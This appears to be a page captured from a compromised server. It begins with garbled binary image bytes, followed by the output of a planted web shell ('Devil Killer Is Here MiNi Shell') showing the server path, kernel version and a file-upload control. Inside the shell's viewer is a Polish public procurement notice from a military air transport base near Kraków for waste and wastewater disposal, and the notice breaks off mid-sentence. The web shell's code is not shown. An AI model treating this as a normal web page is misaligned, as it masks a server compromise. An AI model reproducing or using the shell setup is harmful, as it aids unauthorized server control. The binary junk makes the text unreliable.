JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231212/0054763601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług odbioru, transportu oraz przetworzenia odpadów i ścieków przemysłowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">8 BAZA LOTNICTWA TRANSPORTOWEGO W KRAKOWIE-BALICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 350138871</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. kpt. Mieczysława Medweckiego 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Balice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-083</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">balice.zamowienia@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.8bltr.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> jednostka wojskowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług odbioru, transportu oraz przetworzenia odpadów i ścieków przemysłowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-99696d3e-98e5-11ee-ba3b-4e891c384685</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00547636</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00150038/18/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.11 Usługa odbioru, transportu oraz przetworzenia odpadów i ścieków przemysłowych powstających w wyniku działalności 8 BLTr oraz jednostek będących na zaopatrzeniu gospodarczym.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/8bltr <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/8bltr</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja między Wykonawcami a Zamawiającym odbywa się za pośrednictwem internetowej platformy zakupowej: https://portal.smartpzp.pl/8bltr.<br/>2.	Wykonawcy zainteresowani udziałem w niniejszym postepowaniu są zobligowani <br/>do posiadania konta w systemie https://portal.smartpzp.pl/.<br/>3.	Zamawiający informuje, że instrukcje korzystania z platformy zakupowej dotyczące <br/>w szczególności logowania, pobrania dokumentacji, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformy zakupowej znajdują się w „Instrukcji obsługi Portalu e-Usług SmartPZP” dostępnej na stronie internetowej https://portal.smartpzp.pl/8bltr w zakładce „e-learning” <br/>w menu po lewej stronie. Dokumenty te są wiążące dla Wykonawcy.<br/>4.	Wymagania techniczne i organizacyjne sporządzania i przekazywania korespondencji elektronicznej (w tym przekazywania ofert) za pośrednictwem wskazanego w pkt. 1 środka komunikacji elektronicznej zostały opisane w „Regulaminie Portalu e-Usług”, oraz w „Instrukcji obsługi Portalu e-Usług SmartPZP”, które znajdują się na stronie internetowej platformy <br/>w zakładce „e-learning&#34; lub pod adresem https://portal.smartpzp.pl/8bltr/elearning.<br/><br/>Pozostałe informacje zostały zawarte w SWZ w dziale X.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">54/SI/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 211327,72 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług odbioru, transportu oraz przetworzenia odpadów i ścieków przemysłowych powstających w wyniku działalności 8. Bazy Lotnictwa Transportowego oraz jednostek będących na zaopatrzeniu gospodarczym 8. Bazy Lotnictwa transportowego w zakresie:<br/>•	Zadanie nr 1: Usługa odbioru odpadów ze zbiorników urządzeń sozotechnicznych i ścieków przemysłowych zawierających glikol oraz wykonanie przeglądu serwisowego urządzeń.<br/>Zadanie nr 1.1: Usługa odbioru odpadów pochodzących ze zbiorników urządzeń sozotechnicznych.<br/>Zadanie nr 1.2: Usługa odbioru ścieków przemysłowych zawierających glikol.<br/>Zadanie nr 1.3: Usługa serwisowania urządzeń sozotechnicznych (separatorów substancji ropopochodnych).<br/><br/>2.	Szczegółowy zakres i warunki realizacji zamówienia przedstawiają:<br/>- zał. nr 3 do SWZ – „Projektowane postanowienia umowy”;<br/>- zał. nr 4 do SWZ – „Opis przedmiotu zamówienia”;<br/>- zał. nr 5 A do SWZ – Szczegółowa oferta cenowa – zadanie nr 1. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 113835,56 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90533000-2 - Usługi gospodarki odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90480000-5 - Usługi gospodarki ściekowej</p> <p class="mb-0">90913000-0 - Usługi czyszczenia zbiorników i rezerwuarów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający w kryterium „Cena” będzie przyznawał punkty na podstawie ceny brutto oferty, wskazanej w druku „Oferta”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług odbioru, transportu oraz przetworzenia odpadów i ścieków przemysłowych powstających w wyniku działalności 8. Bazy Lotnictwa Transportowego oraz jednostek będących na zaopatrzeniu gospodarczym 8. Bazy Lotnictwa transportowego w zakresie:<br/>•	Zadanie nr 2: Usługa odbioru, transportu, zbierania lub przetworzenia odpadów niebezpiecznych i innych niż niebezpieczne.<br/><br/>2.	Szczegółowy zakres i warunki realizacji zamówienia przedstawiają:<br/>- zał. nr 3 do SWZ – „Projektowane postanowienia umowy”;<br/>- zał. nr 4 do SWZ – „Opis przedmiotu zamówienia”;<br/>- zał. nr 5 B do SWZ – Szczegółowa oferta cenowa – zadanie nr 2. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 20180,16 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90533000-2 - Usługi gospodarki odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający w kryterium „Cena” będzie przyznawał punkty na podstawie ceny brutto oferty, wskazanej w druku „Oferta”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług odbioru, transportu oraz przetworzenia odpadów i ścieków przemysłowych powstających w wyniku działalności 8. Bazy Lotnictwa Transportowego oraz jednostek będących na zaopatrzeniu gospodarczym 8. Bazy Lotnictwa transportowego w zakresie:<br/>•	Zadanie nr 3: Usługa odbioru, transportu oraz przetworzenia odpadów medycznych.<br/><br/>2.	Szczegółowy zakres i warunki realizacji zamówienia przedstawiają:<br/>- zał. nr 3 do SWZ – „Projektowane postanowienia umowy”;<br/>- zał. nr 4 do SWZ – „Opis przedmiotu zamówienia”;<br/>- zał. nr 5 C do SWZ – Szczegółowa oferta cenowa – zadanie nr 3. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 9180,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90533000-2 - Usługi gospodarki odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90524000-6 - Usługi w zakresie odpadów medycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	W ramach niniejszej umowy Zamawiający przewiduje w zakresie zadania nr 3 realizację zamówienia w ramach zamówienia podstawowego oraz w ramach opcji, zgodnie z art. 441 Ustawy.<br/>2.	Skorzystanie przez Zamawiającego z opcji będzie miało zastosowanie w ramach zawartej umowy według cen jednostkowych określonych w umowie. Opcja w niniejszym postępowaniu polega na możliwości odbioru oprócz ilości podstawowych, dodatkowych ilości odpadów określonych w „Szczegółowej ofercie cenowej – zadanie nr 3”. <br/>3.	Zamawiający zastrzega, iż część zamówienia określona, jako „opcja” jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Ostateczna ilość usług w ramach opcji będzie uzależniona od bieżących potrzeb Zamawiającego i posiadanych przez niego na ten cel środków finansowych. Zamawiający może nie skorzystać z opcji, a Wykonawcy nie przysługują z tego tytułu żadne roszczenia. <br/>4.	Zamawiający może z opcji korzystać wielokrotnie, do wyczerpania maksymalnej ilości świadczeń określonej dla opcji w „Szczegółowej ofercie cenowej – zadanie nr 3” w całym okresie obowiązywania umowy.<br/>5.	Uruchomienie opcji nastąpi po wyczerpaniu ilości usług w zamówieniu podstawowym oraz pozyskaniu przez Zamawiającego środków finansowych na realizację opcji, przez zamówienia składane na zasadach przewidzianych w umowie. <br/>6.	O zamiarze skorzystania z opcji, zakresie i terminach realizacji usług opcjonalnych Zamawiający powiadomi pisemnie Wykonawcę. Skorzystanie z opcji nie wymaga aneksowania umowy.<br/>7.	W przypadku skorzystania przez Zamawiającego z opcji, Wykonawcy będzie się należało wynagrodzenie wg cen jednostkowych jak dla zamówienia podstawowego, określonych przez Wykonawcę w „Szczegółowej ofercie cenowej” – dla danego zadania - stanowiącej część oferty w ramach opcji.<br/>8.	Zamówienie w ramach opcji będzie realizowane w okolicznościach przewidzianych w umowie.<br/>9.	Usługi realizowane w ramach opcji muszą spełniać wszystkie wymogi jak dla zamówienia podstawowego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający w kryterium „Cena” będzie przyznawał punkty na podstawie ceny brutto oferty, wskazanej w druku „Oferta”. W przypadku zadania nr 3 punkty będą przyznawane za cenę brutto oferty obejmującą łącznie zamówienie podstawowe oraz zamówienie w ramach opcji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług odbioru, transportu oraz przetworzenia odpadów i ścieków przemysłowych powstających w wyniku działalności 8. Bazy Lotnictwa Transportowego oraz jednostek będących na zaopatrzeniu gospodarczym 8. Bazy Lotnictwa transportowego w zakresie:<br/>•	Zadanie nr 4: Usługa odbioru, transportu oraz przetworzenia odpadów spożywczych <br/>i kuchennych.<br/><br/>2.	Szczegółowy zakres i warunki realizacji zamówienia przedstawiają:<br/>- zał. nr 3 do SWZ – „Projektowane postanowienia umowy”;<br/>- zał. nr 4 do SWZ – „Opis przedmiotu zamówienia”;<br/>- zał. nr 5 D do SWZ – Szczegółowa oferta cenowa – zadanie nr 4. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 68132,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90533000-2 - Usługi gospodarki odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	W ramach niniejszej umowy Zamawiający przewiduje w zakresie zadania nr 4 realizację zamówienia w ramach zamówienia podstawowego oraz w ramach opcji, zgodnie z art. 441 Ustawy.<br/>2.	Skorzystanie przez Zamawiającego z opcji będzie miało zastosowanie w ramach zawartej umowy według cen jednostkowych określonych w umowie. Opcja w niniejszym postępowaniu polega na możliwości odbioru oprócz ilości podstawowych, dodatkowych ilości odpadów określonych w „Szczegółowej ofercie cenowej – zadanie nr 4”. <br/>3.	Zamawiający zastrzega, iż część zamówienia określona, jako „opcja” jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Ostateczna ilość usług w ramach opcji będzie uzależniona od bieżących potrzeb Zamawiającego i posiadanych przez niego na ten cel środków finansowych. Zamawiający może nie skorzystać z opcji, a Wykonawcy nie przysługują z tego tytułu żadne roszczenia. <br/>4.	Zamawiający może z opcji korzystać wielokrotnie, do wyczerpania maksymalnej ilości świadczeń określonej dla opcji w „Szczegółowej ofercie cenowej – zadanie nr 4” w całym okresie obowiązywania umowy.<br/>5.	Uruchomienie opcji nastąpi po wyczerpaniu ilości usług w zamówieniu podstawowym oraz pozyskaniu przez Zamawiającego środków finansowych na realizację opcji, przez zamówienia składane na zasadach przewidzianych w umowie. <br/>6.	O zamiarze skorzystania z opcji, zakresie i terminach realizacji usług opcjonalnych Zamawiający powiadomi pisemnie Wykonawcę. Skorzystanie z opcji nie wymaga aneksowania umowy.<br/>7.	W przypadku skorzystania przez Zamawiającego z opcji, Wykonawcy będzie się należało wynagrodzenie wg cen jednostkowych jak dla zamówienia podstawowego, określonych przez Wykonawcę w „Szczegółowej ofercie cenowej” – dla danego zadania - stanowiącej część oferty w ramach opcji.<br/>8.	Zamówienie w ramach opcji będzie realizowane w okolicznościach przewidzianych w umowie.<br/>9.	Usługi realizowane w ramach opcji muszą spełniać wszystkie wymogi jak dla zamówienia podstawowego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający w kryterium „Cena” będzie przyznawał punkty na podstawie ceny brutto oferty, wskazanej w druku „Oferta”. W przypadku zadania nr 4 punkty będą przyznawane za cenę brutto oferty obejmującą łącznie zamówienie podstawowe oraz zamówienie w ramach opcji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Uprawnienia do prowadzenia określonej działalności gospodarczej lub 